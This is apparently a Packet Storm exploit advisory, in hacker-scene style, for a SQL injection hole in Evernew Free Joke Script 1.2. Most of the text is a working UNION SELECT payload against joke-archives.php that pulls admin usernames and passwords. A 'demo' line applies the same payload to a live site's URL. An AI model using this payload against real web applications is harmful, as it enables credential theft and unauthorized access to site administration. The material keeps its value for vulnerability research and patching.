Evernew Free Joke Script version 1.2 suffers from a remote SQL injection vulnerability.
fa7bb2e533a6e3dc591efa6e1d919e69c6ba264a9afbb539847a9ee3e95d2637@~~=======================================~~@
============taRentReXx===================
The Indian Hacker
@~~=======================================~~@
@~~=Author : taRentReXx
@~~=Email : darkxr00tx@gmail.com
@~~===============INDIAN=================~~@
@~~=======================================~~@
@~~=Script : Evernewjoke Script
@~~=S.Site : http://www.evernewscripts.com/2009/02/free-joke-script/
@~~=Demo : http://www.evernewjokes.com/
@~~=======================================~~@
@~~=Vul file :joke-archives.php
@~~=Exploit :-
joke-archives.php?start=0&cat_id=-1 union all select 1,2,concat(user,0x3a,password),4,5,0x625920746152656e7452655878,7,8,9,10,11,12,13 from admin--
!! DEMO !!:-
http://www.evernewjokes.com/joke-archives.php?start=0&cat_id=-1 union all select 1,2,concat(user,0x3a,password),4,5,0x625920746152656e7452655878,7,8,9,10,11,12,13 from admin--
@~~=======================================~~@
@~~=======================================~~@
Greetz to all muslims brothers.
to all indians
to milw0rm
@~~===============INDIAN=================~~@
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed